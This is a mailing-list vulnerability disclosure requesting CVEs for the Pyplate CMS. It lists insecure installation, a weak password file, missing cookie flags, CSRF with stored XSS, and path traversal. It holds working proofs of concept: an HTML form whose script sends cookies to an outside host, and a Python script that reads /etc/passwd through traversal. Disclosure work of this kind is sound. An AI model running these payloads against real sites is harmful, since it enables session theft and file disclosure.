[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 14 May 2014 14:21:21 +0300
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Cc: steveb0576@...oo.co.uk, abuse@...LATE.COM, moderators@...db.org
Subject: CVE request: Pyplate multiple vulnerabilities
Hello list,
My friend Teemu V. "requested" security audit for Pyplate. While quickly
checking quality of this software I noticed following issues. This is not a full
security audit as I don't have much free time.
Tested version: v0.08 (still beta)
Vendor notification: 2014-05-13
Issue 1.
Installation instruction tells user to execute following commands without
checking any checksums or similar:
> wget http://pyplate.com/pyplate_install.sh
> chmod +x ./pyplate_install.sh
> sudo ./pyplate_install.sh
Issue 2.
File /usr/lib/cgi-bin/create_passwd_file.py creates passwd.db for admin user
password with world readable permissions. I like that salt :]
20 salt="bla"
21
22 hash=crypt.crypt(random_string,'$6$'+salt+'$')
23 usercredentials="admin:"+hash
24
25 passwdf=open("./passwd.db",'w')
26 passwdf.write(usercredentials)
27 passwdf.close()
-rw-r--r-- 1 www-data www-data 99 May 13 20:45 /usr/share/pyplate/passwd.db
Issue 3.
Application is not using HttpOnly (nor Secure) flag in cookie "id".
Issue 4.
CSRF + XSS with cookie stealing PoC:
<html>
<body>
<form action="http://example.com/admin/addScript.py" method="POST">
<input type="hidden" name="title" value="<script>new Image().src="http://bugs.fi/evil.py?cookie=" encodeURI(document.cookie);</script>" />
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="/" />
<input type="hidden" name="post" value="<p>bugs</p> " />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
There is no CSRF protection and most of admin functionality contain stored XSS
issues.
Issue 5.
File /usr/lib/cgi-bin/download.py is used to download backup file from
installation after admin has created it in web-ui. Note the comment.
21 # need to check that the filename doesn't contain slashes
26 path = pyplate.getCMSRoot() + "/backup/" + filename
27 file = open (path, 'rb')
Normally HTTP POST message looks like:
"""
POST /cgi-bin/download.py HTTP/1.1
Host: 10.0.0.53
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.53/admin/manage_backups.py
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
filename=backup_2014.05.13.223720.tar.gz
"""
Attacker can use this without authentication to download arbitrary files from
the system. File needs to be readable by web server process. PoC for /etc/passwd
below:
"""
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
payload = {'filename': '../../../../etc/passwd'}
r = requests.post('http://example.org/cgi-bin/download.py',
data=payload)
print r.text
"""
If author responds with fixed in version I can coordinate this and send email to
abuse@ address for all users (which is not that many currently).
---
Henri Salo
Download attachment "signature.asc" of type "application/pgp-signature" (199 bytes)
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
